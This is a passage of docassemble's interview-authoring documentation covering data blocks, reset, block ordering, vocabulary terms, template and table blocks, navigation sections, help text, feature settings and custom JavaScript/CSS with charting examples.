import data from YAML files using the objects_from_file() function. Structured data in object form If you set use objects: True in a data block, then lists in your YAML will become DALists in the resulting data structure, and dictionaries in your YAML will become DADicts. The .gathered attribute of these objects will be set to True. In addition, when use objects: True is enabled, any dictionaries in the data structure will be transformed into a DAContext object if the keys of the dictionary are a non-empty subset of question, document, docx, pandoc. This is a useful shorthand for creating DAContext objects. For example: Storing structured data in a variable using code The data from code block works just like the data block, except that Python code is used instead of text or Mako markup. variable name: fruits data from code: Apple: description: | ', '.join(['red', 'shiny', 'for teachers']) seeds: 10/2 Orange: description: | capitalize('round') + " and orange" seeds: seeds_in_orange Peach: description: peach_description seeds: 10**6 Pear: description: | "Like an apple, but not like an apple." seeds: 0 --- question: | How many seeds in an orange? fields: - no label: seeds_in_orange datatype: range min: 0 max: 100 --- question: | How would you describe a peach? fields: - no label: peach_description --- question: | What is your favorite fruit? field: user_favorite_fruit choices: code: fruits.keys() --- mandatory: True question: | Summary of ${ user_favorite_fruit } subquestion: | ${ fruits[user_favorite_fruit]['description'] } The ${ user_favorite_fruit } has ${ nice_number(fruits[user_favorite_fruit]['seeds']) } seeds. Structured data from code in object form The use objects modifier can also be used with data from code. variable name: fruits use objects: True data from code: - question: | "Apple" document: | "red fruit" - question: | "Orange" document: | "fruit that rhymes " + "with nothing" - question: | "Peach" document: | "juicy fruit" docx: | "peachy peach" pandoc: | "very juicy " + "fruit" --- question: | What is your favorite fruit? fields: - Fruit: favorite_fruit datatype: object choices: fruits Keeping variables fresh: reset The reset block will cause variables to be undefined every time a screen loads. This can be helpful in a situation where a variable is set by a code block and the value of the variable ought to be considered afresh based on the user’s latest input. --- reset: - client_is_guilty - opposing_party_is_guilty --- Effectively, this causes variables to act like functions. Another way to use this feature is to set the reconsider modifier on a code block. This will have the same effect as reset, but it will apply automatically to all of the variables that are capable of being assigned by the code block. The reset block and the reconsider modifier are computationally inefficient because they cause extra code to be run every time a new screen loads. For a more computationally efficient alternative, see the reconsider() function Changing order of precedence As explained in how docassemble finds questions for variables, if there is more than one question or code block that offers to define a particular variable, blocks that are later in the YAML file will be tried first. If you would like to specify the order of precedence of blocks in a more explicit way, so that you can order the blocks in the YAML file in whatever way you want, you can tag two or more blocks with ids and insert an order block indicating the order of precedence of the blocks. For example, suppose you have an interview with two blocks that could define the variable favorite_fruit. Normally, docassemble will try the the second block first because it appears later in the YAML file; the second block will “override” the first. However, if you actually want the first block to be tried first, you can manually specify the order of blocks: order: - informal favorite fruit question - regular favorite fruit question --- id: informal favorite fruit question question: | What the heck is your favorite fruit? fields: Fruit: favorite_fruit --- id: regular favorite fruit question question: | What is your favorite fruit? fields: Fruit: favorite_fruit --- mandatory: True question: | Your favorite fruit is ${ favorite_fruit }. Another way to override the order in which blocks will be tried is by using the id and supersedes question modifiers. Vocabulary terms and auto terms --- terms: enderman: | A slender fellow from The End who carries enderpearls and picks up blocks. fusilli: | A pasta shape that looks like a corkscrew. --- Sometimes you will use vocabulary that the user may or may not know. Instead of interrupting the flow of your questions to define every term, you can define certain vocabulary words, and docassemble will turn them into hyperlinks wherever they appear in curly brackets. When the user clicks on the hyperlink, a popup appears with the word’s definition. If you want the terms to be highlighted every time they are used, whether in curly brackets or not, use auto terms. auto You can also use terms and auto terms as question modifiers, in which case the terms will apply only to the question, not to the interview as a whole. When you use terms and auto terms as initial blocks, you cannot use Mako templating in the definitions, but when you use them as question modifiers, you can use Mako templating. The template block The word “template” has a number of different meanings. If you are interested in how to insert variables into the text of your questions or documents using the Mako templating syntax, see markup. If you are interested in document assembly based on forms or document templates, see the Documents section. A template block allows you to assign text to a variable and then re-use the text by referring to a variable. template: disclaimer content: | The opinions expressed herein do not *necessarily* reflect the views of ${ company }. --- field: intro_screen question: Welcome to the interview! subquestion: | Greetings. We hope you learn something from this guided interview. ${ disclaimer } To get started, press **Continue**. The content of a template may contain Mako and Markdown. The name after template: is a variable name that you can refer to elsewhere. The template block, like question and code blocks, offers to define a variable. So when docassemble needs to know the definition of disclaimer and finds that disclaimer is not defined, it will look for a question, code, or template block that offers to define disclaimer. If it finds the template block above, it will define the disclaimer variable. Optionally, a template can have a subject: template: disclaimer subject: | Please be advised content: | The opinions expressed herein do not *necessarily* reflect the views of ${ company }. --- field: intro_screen question: Welcome to the interview! subquestion: | Greetings. We hope you learn something from this guided interview. To get started, press **Continue**. under: | ### ${ disclaimer.subject } ${ disclaimer.content } You can refer to the two parts of the template by writing, e.g., disclaimer.subject and disclaimer.content. Note that writing ${ disclaimer } has the same effect as writing ${ disclaimer.content }. You can also write ${ disclaimer.show() } (for interchangability with images). To convert the subject and the content to HTML, you can write disclaimer.subject_as_html() and disclaimer.content_as_html(). These methods take the optional keyword argument trim. If True, the resulting HTML will not be in a <p> element. (The default is False.) template objects are also useful for defining the content of e-mails. See send_email() for more information on using templates with e-mails. You might prefer to write text in Markdown files, rather than in Markdown embedded within YAML. To facilitate this, docassemble allows you to create a template that references a separate Markdown file. The file disclaimer.md is a simple Markdown file containing the disclaimer from the previous example. The content file is assumed to refer to a file in the “templates” folder of the same package as the interview source, unless a specific package name is indicated. (e.g., content file: docassemble.demo:data/templates/hello_template.md) In the example above, the sample interview is in the file docassemble.base:data/questions/examples/template-file.yml, while the Markdown file is located at docassemble.base:data/templates/disclaimer.md. If the content file specifier refers to a dictionary in which the only key is code, the code will be evaluated as Python code, and the result will be used as the file. code: | template_file_to_use = 'disclaimer.md' --- template: disclaimer content file: code: template_file_to_use --- field: intro_screen question: Welcome to the interview! subquestion: | Greetings. We hope you learn something from this guided interview. ${ disclaimer } To get started, press **Continue**. In this example, the code evaluated to the name of a file in the templates folder. The code may also evaluate to a URL, DAFile, DAFileList, DAFileCollection, or DAStaticFile. A template can also be inserted into a docx template file. This can be useful when you want to insert multiple paragraphs of text into a DOCX file. Ordinarily, when you insert text into a docx template file, newlines are replaced with spaces. The effect of inserting a template into a docx template file is controlled by the new markdown to docx directive in the Configuration. If you set new markdown to docx: True in the Configuration, then you should insert a template using: {{p the_template }} However, if you don’t set the new markdown to docx directive (the default of which is False), then you need to insert the template using: {{r the_template }} In the future, the default will change to True. The table block The table works in much the same way as a template, except its content is a table that will be formatted appropriately whether it is included in a question or in a document. This block should be used when each row of your table represents an item in a group; that is, you do not know how many rows the table will contain, because the information is in a list, dictionary, or set. If you just want to format some text in a table format, see the documentation about tables in the markup section. In the following example, the variable fruit is a DAList of objects of type Thing, each of which represents a fruit. Each row in the resulting table will describe one of the fruits. The table: fruit_table line indicates the name of the variable that will hold the template for table. The question block includes the table simply by referring to the variable fruit_table. The rows: fruit line indicates the variable containing the group of items that represent rows in the table. The fruit variable is a DAList that gets populated during the interview. columns describes the header of each column and what should be printed in each cell under that header. Like a fields list within a question, columns must contain a YAML list where each item is a key/value pair (a one-item dictionary) where the key is the header of the column and the value is a Python expression representing the contents of the cell for that column, for a given row. In the example above, the header of the first column is “Fruit Name” and the Python expression that produces the name of the fruit is row_item.name. There are two special variables available to these Python expressions: row_item: this is the item in the group corresponding to the current row. row_index: this is 0for the first row, 1for the second row, 2for the third row, etc. You can pretend that the Python expressions are evaluated in a context like this: row_index = 0 for row_item in fruit: # evaluation takes place here row_index = row_index + 1 In this example, the first column will show name of the fruit ( row_item.name) and the second column will show the number of seeds ( row_item.seeds). The header of each column is plain text (not a Python expression). The header can include Mako and Markdown. If you have a complicated header, you can use the special keys header and cell to describe the header and the cell separately. (This is similar to using label and field within a fields list.) You can use Python to create cells with content that is computed from the items of a group. The above example prints the name of the fruit as a plural noun, and inflates the number of seeds. Remember that the Python code here is an expression, not a block of code. If you want to use if/then/else logic in a cell, you will need to use Python’s one-line form of if/then/else: When fruit_table is inserted into the question, the result will be a Markdown-formatted table. This: question: | Information about fruit subquestion: | Here is a fruity summary. ${ fruit_table } will have the effect of this: question: | Information about fruit subquestion: | Here is a fruity summary. Fruit Name |Number of Seeds -----------|--------------- Apples |4 Oranges |3 Pears |6 For more information about Markdown-formatted tables, see the documentation about tables in the markup section. Instead of using a table block, you could construct your own Markdown tables manually using a Mako “for” loop. For example: The advantages of using the table block are: - The tableblock describes the content of a table in a conceptual rather than visual way. In Markdown, simple tables look simple, but complicated tables can look messy. The tableblock allows you to map out your ideas in outline form rather than squeezing everything into a single line that has a lot of punctuation marks. - The tableblock will attempt to set the relative table widths in a sensible way based on the actual contents of the table. If you create your own tables in Markdown, and the text in any cell wraps, the relative table widths of the columns will be decided based on the relative widths of the cells in the divider row ( ----|---------). You might not know in advance what the relative sizes of the text will be in each column. The table block acts like a template block in that the variable it sets will be a docassemble object. The .content attribute will be set to the text of the table in Markdown format. If the variable indicated by rows is empty, the table will display with only the headers. To suppress this, you can add show if empty: False to the table block. The resulting .content will be the empty string, "". If you would like a message to display in place of the table in the event that there are no rows to display, you can set show if empty to this message. Mako and Markdown can be used. The message will become the .content of the resulting object. If you include a table in the content of an attachment, you might find that the table is too wide, or not wide enough. Pandoc breaks lines, determines the relative width of columns, and determines the final width of a table based on the characters in the divider row ( ----|---------). By default, docassemble will construct a divider row that is no longer than 65 characters. This should work for standard applications (12 point font, letter size paper). You can change the number of characters from 65 to something else by setting value of table width in a features block. You can also use table blocks with DADict objects: scan for variables: False mandatory: True code: | income['employment'].receives = True income['employment'].amount = 237 income['benefits'].receives = False income['interest'].receives = True income['interest'].amount = 23 --- table: income.table rows: income columns: - Type: | row_index - Receives: | 'Yes' if row_item.receives else 'No' - Amount: | currency(row_item.amount) if row_item.receives else '' --- mandatory: True question: | Summary of income subquestion: | ${ income.table } When rows refers to a DADict, then in the columns, row_index represents the “key” and row_item represents the value of each item in the dictionary. You can pretend that the Python expressions under columns are evaluated in a context like this: for row_index in sorted(income): row_item = fruit[row_index] # evaluation takes place here Note that running sorted() on a dictionary returns an alphabetically sorted list of keys of the dictionary. In Python, dictionaries are inherently unordered. The keys are sorted is this fashion so that the order of the rows in a table does not change every time the table appears on the screen. Exporting tables to Excel and other formats You can call the export() method on a table to get a DAFile representation of the table. For example, this interview provides a Microsoft Excel .xlsx file representation of a table: objects: - fruit: DAList --- mandatory: true code: | fruit.object_type = Thing --- mandatory: True question: | Information about fruit subquestion: | Here is a fruity summary. ${ fruit_table } You can also [download this information]. [download this information]: ${ fruit_table.export('fruit.xlsx', title='fruit').url_for() } --- table: fruit_table rows: fruit columns: - Fruit Name: row_item.name - Seeds: row_item.seeds - Last eaten: row_item.last_eaten This function uses the pandas module to export to various formats. The export() method takes a filename, which is parsed to determine the file format you want to use. This can also be provided as the filename keyword parameter. If you omit the filename, you can indicate the file format using the file_format keyword parameter. The default file format is 'xlsx'. The valid file formats include csv, xlsx, and json. The title keyword parameter indicates the name of the data set. This is used as the name of the Microsoft Excel sheet. When the xlsx format is used, you can set the freeze_panes keyword parameter to False to turn off the Microsoft Excel “freeze panes” feature. Here are some examples of usage: fruit_table.export('fruit.xlsx'): returns a Microsoft Excel file called fruit.xlsx. fruit_table.export('fruit.xlsx', title='Fruits'): returns a Microsoft Excel file called fruit.xlsxwhere the sheet is named “Fruits”. fruit_table.export('fruit.xlsx', title='Fruits', freeze_panes=False): returns a Microsoft Excel file called fruit.xlsxwhere the sheet is named “Fruits” and the “freeze panes” feature is turned off. fruit_table.export('fruit.csv'): returns a comma-separated values file called fruit.csv. fruit_table.export(file_format='csv'): returns a comma-separated values file called file.csv. fruit_table.export(): returns a Microsoft Excel file called file.xlsx. Converting tables to a pandas dataframe If you want to work with your table as a pandas dataframe, you can call fruit_table.as_df() to obtain the information for the table as a pandas dataframe object. However, note that objects from the pandas package cannot necessarily be “pickled” by Python, so it is best if you call this method from functions in Python modules, or in such a way that the results do not get saved to variables in the interview. Using tables to edit groups You can use a table to provide the user with an interface for editing an already-gathered DAList or DADict. mandatory: True question: | All done subquestion: | The people are ${ person }. Your favorite is ${ favorite }. ${ person.table } ${ person.add_action() } --- table: person.table rows: person columns: - Name: | row_item.name.full() - Fruit: | row_item.favorite_fruit edit: - name.first - favorite_fruit For more information about this feature, see the section on editing an already-gathered list in the section on groups. Defining the sections for the navigation bar You can add use the navigation bar feature or the nav.show_sections() function to show your users the “sections” of the interview and what the current section of the interview is. Here is a complete example. Subsections are supported, but only one level of nesting is allowed. If your interview uses multiple languages, you can specify more than one sections block and modify each one with a language modifier: --- language: en sections: - Introduction - Fruit - Vegetables - Conclusion --- language: es sections: - Introducción - Fruta - Vegetales - Conclusión --- If no language is specified, the fallback language * is used. In the example above, the section modifier referred to sections using the same text that is displayed to the user. However, in some circumstances, you might want to use a shorthand to refer to a section, and update the actual section names displayed to the user without having to make changes in numerous places in your interview. You can do this by using key/value pairs in your sections block, and using the special key subsections to indicate subsections: sections: - intro: Introduction - about: About you subsections: - contact: Contact info - demographic: Demographics - prefs: Preferences - conclusion: Conclusion --- features: navigation: True --- --- mandatory: True question: | What is your name? fields: - First Name: first_name - Last Name: last_name section: contact --- mandatory: True question: | What is your e-mail address? fields: - E-mail: email_address datatype: email --- mandatory: True question: | What is your gender? field: gender choices: - Male - Female - Something else section: demographic --- mandatory: True question: | What kind of belly button do you have? field: belly_button choices: - Innie - Outie --- mandatory: True question: | What is your favorite fruit? fields: - Favorite fruit: favorite_fruit section: prefs --- mandatory: True question: | What is your favorite vegetable? fields: - Favorite vegetable: favorite_vegetable --- mandatory: True question: Thank you. subquestion: | ${ first_name }, Your answers mean a lot to me. I am going to go eat some ${ favorite_vegetable } now. section: conclusion The keywords for section names need to be valid Python names. When choosing keywords, make sure not to use the names of variables that already exist in your interview. This is because the keywords can be used to make the left-hand navigation bar clickable. If a keyword for a section is a variable that exists in the interview, clicking on the section will cause an action to be launched that seeks a definition of that variable. The recommended way to use this feature is to set up review blocks that have event set to the keyword of each section that you want to be clickable. sections: - intro: Introduction - about: About you subsections: - contact: Contact info - demographic: Demographics - prefs: Preferences - conclusion: Conclusion --- event: contact section: contact question: | Review contact information review: - Edit name: first_name button: | Name: ${ first_name } ${ last_name } - Edit e-mail: email_address button: | E-mail: ${ email_address } --- event: demographic section: demographic question: | Review demographic information review: - Edit gender: gender button: | Gender: ${ gender } - Edit belly button: belly_button button: | Belly button: ${ belly_button } --- event: prefs section: prefs question: | Preferences review: - Edit fruit: favorite_fruit button: | Favorite fruit: ${ favorite_fruit } - Edit vegetable: favorite_vegetable button: | Favorite vegetable: ${ favorite_vegetable } Note that if you use review blocks in an interview with sections, every question should have a section defined. Otherwise, when your users jump around the interview, their section may not be appropriate for the question they are currently answering. Alternatively, you could use code blocks and the nav.set_section() function to make sure that the section is set appropriately. By default, users are only able to click on sections that they have visited. If you want users to be able to click on any section at any time, set progressive to False: sections: - intro: Introduction - about: About you subsections: - contact: Contact info - demographic: Demographics - prefs: Preferences - conclusion: Conclusion progressive: False --- event: intro code: | force_ask('sees_nav_bar') --- event: about code: | force_ask('intro_to_about_you') --- event: contact code: | force_ask('first_name', 'email_address') --- event: demographic code: | force_ask('gender', 'belly_button') --- event: prefs code: | force_ask('favorite_fruit', 'favorite_vegetable') --- event: conclusion code: | force_ask('final_screen') --- features: navigation: True Assisting users with interview help --- interview help: heading: How to use this web site content: | Answer each question. At the end, you will get a prize. --- An interview help block adds text to the “Help” page of every question in the interview. If the question has help text of its own, the interview help will appear after the question-specific You can also add audio to your interview help: --- interview help: heading: How to use this web site audio: answer_each_question.mp3 content: | Answer each question. At the end, you will get a prize. --- You can also add video to help text using the video specifier. See the question modifiers section for an explanation of how audio and video file references work. You can also provide a label as part of the interview help. This label will be used instead of the word “Help” in the navigation bar as a label for the “Help” tab. --- interview help: label: More info heading: More information about this web site content: | If you are not sure what the right answer is, provide your best guess. You are answering these questions under the pains and penalties of perjury. Your answers will be shared with the special prosecutor. --- Note that if you provide question-specific help, and you include a label as part of that help, that label will override the default label provided in the interview help (except if question help button is enabled). Mako functions: def def: adorability mako: | <%def \ ${ person } is adorable. \ </%def> A def block allows you to define Mako “def” functions that you can re-use later in your question or document templates. You can use the above function by doing: --- question: | ${ describe_as_adorable(spouse) } Am I right? yesno: user_agrees_spouse_is_adorable usedefs: - adorability --- Due to the way docassemble parses interviews, the def block needs to be defined before it is used. Note the \ marks at the end of the lines in the mako definition. Without these marks, there would be an extra newline inserted. You may or may not want this extra newline. Setting the default role default role: client code: | if user_logged_in() and user_has_privilege('advocate'): user = advocate role = 'advocate' else: user = client role = 'client' set_info(user=user, role=role) --- If your interview uses the roles feature for multi-user interviews, the default role specifier will define what role or roles will be required for any question that does not contain an explicit role specifier. When you use the roles feature, you need to have some way of telling your interview logic what the role of the interviewee is. If you include code within the same block as your default role specifier, that code will be executed every time the interview logic is processed, as if it was marked as initial. For this reason, any default role specifier that contains code should be placed earlier in the interview file than and mandatory questions or code blocks. In the example above, the interview has two roles: “client” and “advocate”. The special variables user and role are set in the code block, which is executed every time the interview logic is processed. In addition, the set_info() function is called. This lets the linguistic functions know who the user is, so that questions can ask “What is your date of birth?” or “What is John Smith’s date of birth” depending on whether the current user is John Smith or not. Setting the default language --- default language: es --- This sets the language to use for all of the remaining questions in the file for which the language modifier is not specified. The purpose of this is to save typing; otherwise you would have to set the language modifier for each question. Note that this does not extend to questions in included files. If your interview only uses one language, it is not necessary to (and probably not a good idea to) set a default language. See language support for more information about how to create multi-lingual interviews. See question modifiers for information about the language setting of a question. Translation files One way that docassemble supports multi-lingual interviews is through the language modifier on a question and the default language block, which sets a default value for the language modifier. Your interview can contain questions in English that don’t have a language modifier, and questions in French that have the language: fr modifier set. If the current language in an interview (as determined by the set_language() function) is French ( fr), then when docassemble seeks a block to set a given variable, it will search the French blocks first. This method of creating multi-lingual interviews is good if the person who translates text from English to French is someone who understands how docassemble YAML files work. There is another method of creating multi-lingual interviews that may be preferable if the translator is someone who does not understand how docassemble YAML files work. This second method extracts the phrases from an interview (specifically, everywhere in the YAML where Mako templating is allowed) and lists them all in an Excel spreadsheet. The spreadsheet can then be given to a French translator, and the translator fills out a column in the spreadsheet with the translation of each phrase. Then the completed spreadsheet can be stored in the sources folder of a package and referenced in an interview using the translations block: translations: - custody.xlsx Then, if the current language in an interview is French, the interview will use the French version of each phrase. This allows you to support multi-lingual interviews while having a code base that is all in one language. To obtain such a spreadsheet for a given interview, visit the Utilities page and go to the section called Download an interview phrase translation file. The translations block is only capable of defining translations for blocks that come after the translations block. Therefore, it is a good practice to make sure that the translations block is placed as one of the very first blocks in your interview YAML file. The language support for more information about how to create multi-lingual interviews. See question modifiers for information about the language setting of a question. Default screen parts The default screen parts allows you to write Mako and Markdown to create text that will appear by default in parts of the screen on every page. default screen parts: under: | You have seen ${ quantity_noun(counter, 'screen') } of this interview so far. help label: | About continue button label: | Go to next step subtitle: | A _groovy_ interview pre: | The text below **does not** constitute legal advice. submit: | Please re-read the question before moving forward. post: | This interview was generously sponsored by Example, Inc. css class: normalquestion When using this, make sure you do not cause your interview to go into an infinite loop. If any of your screen parts require information from the user, your interview will need to pose a question to the user to gather that information, but in order to pose the question, it will need the information. To avoid this, you can use the defined() function or other methods. For information about other ways to set defaults for different parts of the screens during interviews, see the screen parts section. Custom validation messages The docassemble user interface uses the jQuery Validation Plugin to pop up messages when the user does not enter information for a required field, or if a number does not meet a minimum, or if an e-mail address is not valid, and other circumstances. The messages that are displayed can be customized in a number of ways. On a server-wide level, the messages can be customized the same way other built-in phrases in docassemble can be customized: using the words directive in the Configuration to make a “translation table” between the built-in text to the values you want to be used in their place. On an interview-wide level, the messages can be customized using a default validation messages block: Within an individual field in a question, you can use the validation messages field modifier to define what validation messages should be used. These will override the default validation messages. Each validation message has a code. In the above example, the codes used were required and max. The complete list of codes is: requiredfor This field is required.There is a default text transformation for language enthat translates this to “You need to fill this in.” This is the standard message that users see when they fail to complete a required field. multiple choice requiredfor You need to select one.This is shown for multiple-choice fields. combobox requiredfor You need to select one or type in a new value.This is shown for comboboxfields. checkboxes requiredfor Check at least one option, or check "%s"This is shown for checkboxesfields with a “None of the above” option. It is also used for yesnofields with uncheck othersset, which is shown when the user does not check any of the yesnofields. %sis a code that is replaced with the label of the “None of the above” choice. minlengthfor You must type at least %s characters.This is shown when there is a minlengthfield modifier. maxlengthfor You cannot type more than %s characters.This is shown when there is a maxlengthfield modifier. checkbox minmaxlengthfor Please select exactly %s.This is shown when there is a checkboxesfield with a minlengthfield modifier that is the same as the maxlengthfield modifier. checkbox minlengthfor Please select at least %s.This is shown when there is a checkboxesfield with a minlengthfield modifier set to something other than 1. checkbox maxlengthfor Please select no more than %s.This is shown when there is a checkboxesfield with a maxlengthfield modifier. datefor You need to enter a valid date.This is shown for datefields when the text entered is not an actual date. date minmaxfor You need to enter a date between %s and %s.This is shown for datefields with minand maxset. date minfor You need to enter a date on or after %s.This is shown for datefields with minset. date maxfor You need to enter a date on or before %s.This is shown for datefields with maxset. timefor You need to enter a valid time.This is shown for timefields. datetimefor You need to enter a valid date and time.This is shown for datetimefields. You need to enter a complete e-mail address.This is shown for numberfor You need to enter a number.This is shown for numeric fields ( number, currency, float, and integer) when the input is not valid. minfor You need to enter a number that is at least %s.This is shown for numeric fields with a minfield modifier. maxfor You need to enter a number that is at most %s.This is shown for numeric fields with a maxfield modifier. filefor You must provide a file.This is shown for file upload fields. acceptfor Please upload a file with a valid file format.This is shown for file upload fields with an acceptfield modifier. Machine learning training data If you use machine learning in your interviews, then by default, docassemble will use training data associated with the particular interview in the particular package in which the interview resides. If you would like your interview to share training data with another interview, you can use the machine learning storage specifier to point to the training data of another interview. For example, suppose you have developed an interview called child_custody.yml that uses machine learning, and you have built rich training sets for variables within this interview. Then you decide to develop another interview, in the same package, called child_support.yml, which uses many of the same variables. It would be a lot of work to maintain two identical training sets in two places. In this scenario, you can add the following block to the child_support.yml interview: --- machine learning storage: ml-child_custody.json --- ml-child_custody.json is the name of a file in the data/sources directory of the package. This file contains the training data for the child-custody.yml interview. The naming convention for these data files is to start with the name of the interview YAML file, add ml- to the beginning, and replace .yml with .json. Now, both the child-custody.yml and child-support.yml interviews will use ml-child_custody.json as “storage” area for training data. In the Training interface, you will find this data set under the name child_custody. If you had run the child-support.yml interview before adding machine learning storage, you may still see a data set called child-support in the Training interface. If you are using the Playground, you may see a file called ml-child-support.json in the Sources folder. To get rid of this, go into the Playground and delete the ml-child-support.json file from the Sources folder. Then go into the Training interface and delete any “items” that exist within the child-support interview. If you want, you can set machine learning storage to a name that does not correspond with an actual interview. For example, you could include machine learning storage: ml-family-law.json in both the child-custody.yml and child-support.yml interviews. Even though there is no interview called family-law.yml, this will still work. If you are using the Playground, a file called ml-family-law.json will automatically be created in the Sources folder. You can also share “storage” areas across packages. Suppose you are working within a package called docassemble.missourifamilylaw, but you want to take advantage of training sets in a package called docassemble.generalfamilylaw. You can write: --- machine learning storage: docassemble.generalfamilylaw:data/sources/ml-family.json --- For more information about managing training data, see the machine learning section on packaging your training sets Optional features The features block sets some optional features of the interview. Whether debugging features are available If the debug directive in the Configuration is True, then by default, the navigation bar will contain a “Source” link that shows information about how the interview arrived at the question being shown. If the debug directive is False, then this will not be shown. This can be overridden in the features by setting debug to True or False depending on the behavior you want. The following example demonstrates turning the debug feature off. On the server that hosts the demonstration interviews, the debug directive is True, so the “Source” link is normally shown. Setting debug: False makes the “Source” link disappear. Whether interview is centered If you do not want your interview questions to be centered on the screen, set centered to False. Progress bar The progress bar feature controls whether a progress bar is shown during the interview. You can use the progress modifier or the set_progress() function to indicate the setting of the progress bar. If you want the progress bar to display the percentage, include show progress bar percentage: True: By default, if you do not set the progress modifier on a question, then each time the user takes a step, the progress bar will advance 5% of the way toward the end. The 5% figure is known as the progress bar multiplier and it is configurable: features: progress bar: True progress bar multiplier: 0.01 The default is 0.05. If you set progress bar method: stepped, the progress bar advances a different way when there is no progress modifier. features: progress bar: True progress bar method: stepped Instead of advancing toward 100%, it advances toward the next greatest progress value that is defined on a question in the interview. (Note that docassemble cannot predict the future, so whether the question with the next highest progress value will actually be reached is unknown; docassemble just looks at all the questions in the interview that have progress values defined.) The amount by which it advances is determined by progress bar multiplier. To use the default method for advancing the progress bar, omit progress bar method, or set it to default. features: progress bar: True progress bar method: default Navigation bar The navigation feature controls whether a navigation bar is shown during the interview. You can use the sections initial block or the nav.set_sections() function to define the sections of your interview. The section modifier or the nav.set_section() function can be used to change the current section. Note that the section list is not shown on small devices, such as smartphones. To show a smartphone user a list of sections, you can use the nav.show_sections() function. If you want the navigation bar to be horizontal across the top of the page, set navigation to horizontal: Back button style By default, there is a “Back” button located in the upper-left corner of the page. (However, the “Back” button is not present when the user is on the first page of an interview, or the prevent_going_back() function has been used, or the prevent going back modifier is in use.) Whether this back button is present can be controlled using the navigation back button feature. This will hide the “Back” button: features: navigation back button: False You can also place a “Back” button inside the body of a question, next to the other buttons on the screen, by setting the question back button feature to True (the default is False). You can also place a “Back” button inside the body of a question on some questions but not others, using the back button modifier. Help tab style When interview help is available, or the help modifier is present on a question, the “Help” tab will be present in the navigation bar. When the help modifier is present, the “Help” tab is highlighted yellow and marked with a yellow star. When the user presses the help tab, the help screen will be shown. If you set the question help button to True, users will be able to access the help screen by pressing a “Help” button located within the body of the question, to the right of the other buttons on the page. When question help button is True, the “Help” tab will not be highlighted yellow. Here is an interview in which the question help button is not enabled (which is the default). features: question help button: False --- Here is the same interview, with the question help button feature enabled: features: question help button: True --- Note that when question help button is enabled, the label for the help tab in the navigation bar always defaults to “Help” or to the label of the interview help, and it is not highlighted yellow when question-specific help is available. Positioning labels above fields By default, the docassemble user interface uses Bootstrap’s horizontal form style. If you want your interview to use the Bootstrap’s standard style, set labels above fields to True: features: labels above fields: True Hiding the standard menu items By default, the menu in the corner provides logged-in users with the ability to edit their “Profile” and the ability to go to “My Interviews,” which is a list of interview sessions they have started. If you want to disable these links, you can use the hide standard menu specifier: features: hide standard menu: True If you want to add any of these links manually, or add them with different names, you can do so with the menu_items special variable and the url_of() function. mandatory: True code: | menu_items = [ {'label': 'Edit my Profile', 'url': url_of('profile')}, {'label': 'Saved Sessions', 'url': url_of('interviews')} ] Javascript and CSS files If you are a web developer and you know how to write HTML, Javascript, and CSS, you can embed HTML in your interview text. You can also bring Javascript and CSS files into the user’s browser. For example, the following interview brings in a Javascript file, my-functions.js, and a CSS file, my-styles.css, into the user’s browser. These files are located in the data/static folder of the same package in which the interview is located. The contents of my-functions.js are: $(document).on('daPageLoad', function(){ $(".groovy").html("I am purple"); }); The contents of my-styles.css are: .groovy { color: purple; } You can write whatever you want in these files; they will simply be loaded by the user’s browser. Note that your Javascript files will be loaded after jQuery is loaded, so your code can use jQuery, as this example does. If you have Javascript code that you want to run after each screen of the interview is loaded, attach a jQuery event handler to document for the event daPageLoad, which is a docassemble-specific event that is triggered after each screen loads. (Since docassemble uses Ajax to load each new screen, if you attach code using jQuery’s ready() method, the code will run when the browser first loads, but not every time the user sees a new screen.) The example above demonstrates this; every time the page loads, the code will replace the contents of any element with the class groovy. This example demonstrates bringing in CSS and Javascript files that are located in the data/static directory of the same package as the interview. You can also refer to files in other packages: features: css: docassemble.demo:data/static/my.css or on the internet at a URL: features: javascript: Also, if you want to bring in multiple files, specify them with a YAML list: features: css: - my-styles.css - javascript: - - If you want to include CSS or Javascript code in a specific question, rather than in all questions of your interview you can use the script and css modifiers. The HTML of the screen showing a question contains a number of placeholder CSS classes that are not used for formatting, but that are available to facilitate customization: - If a questionis tagged with an id, the <body>will be given a class beginning with question-followed by the id, except that the idwill be transformed into lowercase and non-alphanumeric characters will be converted into hyphens. For example, if the idis Intro screen, the class name will be question-intro-screen. <fieldset>s are tagged with classes like field-yesnoand field-buttons. <div>s that contain fields are tagged with classes like field-container, field-container-datatype-area, field-container-inputtype-combobox, and other classes. For more information, use the DOM inspector in your web browser to see what the class names are and which elements have the class names. Example use of JavaScript: charting Here is an example interview that uses a javascript feature and a script modifier to draw a doughnut chart using chart.js. features: javascript: --- mandatory: True question: Your stuff subquestion: | <div class="chart-container" style="position: relative; height:450px; width:100%"> <canvas id="myChart" width="600" height="400"></canvas> </div> script: | <script> var ctx = $("#myChart"); var myDoughnutChart = new Chart(ctx, { type: 'doughnut', data: ${ json.dumps(data) } }); </script> --- code: | data = {'datasets': [{'data': [how_many[y] for y in things], 'backgroundColor': [color[y] for y in range(len(things))]}], 'labels': things} --- variable name: color data: - '' Here is an example interview that draws a pie chart using Google Charts. features: javascript: --- mandatory: True question: Your stuff subquestion: | <div id="piechart" style="width: 100%; min-height: 450px;"></div> script: | <script type="text/javascript"> google.charts.load('current', {'packages':['corechart']}); google.charts.setOnLoadCallback(drawChart); function drawChart() { var chartwidth = $('#piechart').width(); var data = google.visualization.arrayToDataTable(${ json.dumps(data) }); var options = { title: ${ json.dumps(title) }, width: chartwidth, chartArea: {width: chartwidth, left: 20, top: 20, height: chartwidth*0.75} }; var chart = new google.visualization.PieChart(document.getElementById('piechart')); chart.draw(data, options); } </script> --- code: | title = "Household stuff" data = [['Thing', 'How many']] + [[y, how_many[y]] for y in things] Bootstrap theme Using the bootstrap theme feature, you can change the look and feel of your interview’s web interface by instructing your interview to use a non-standard CSS file in place of the standard CSS file used by Bootstrap. The file can be referenced in a number of ways: lumen.min.css: the file lumen.min.cssin the “static” folder of the current package. docassemble.demo:lumen.min.css: the file lumen.min.cssin the “static” folder ( data/static/) of the docassemble.demopackage. docassemble.demo:data/static/lumen.min.css: the same.: a file on the internet. For more information about using custom Bootstrap themes, and for information about applying themes on a global level, see the documentation for the bootstrap theme configuration directive. Inverted Bootstrap navbar By default, docassemble uses Bootstrap’s “dark” (formerly known as “inverted”) style of navigation bar so that the navigation bar stands out from the white background. If you do not want to use the inverted navbar, set the inverse navbar feature to False. To make this change at a global level, see the inverse navbar configuration directive. Hiding the navbar By default, docassemble shows a navigation bar at the top of the screen. To make it disappear, you can set hide navbar: True. Width of tables in attachments As explained more fully in the tables section, if you 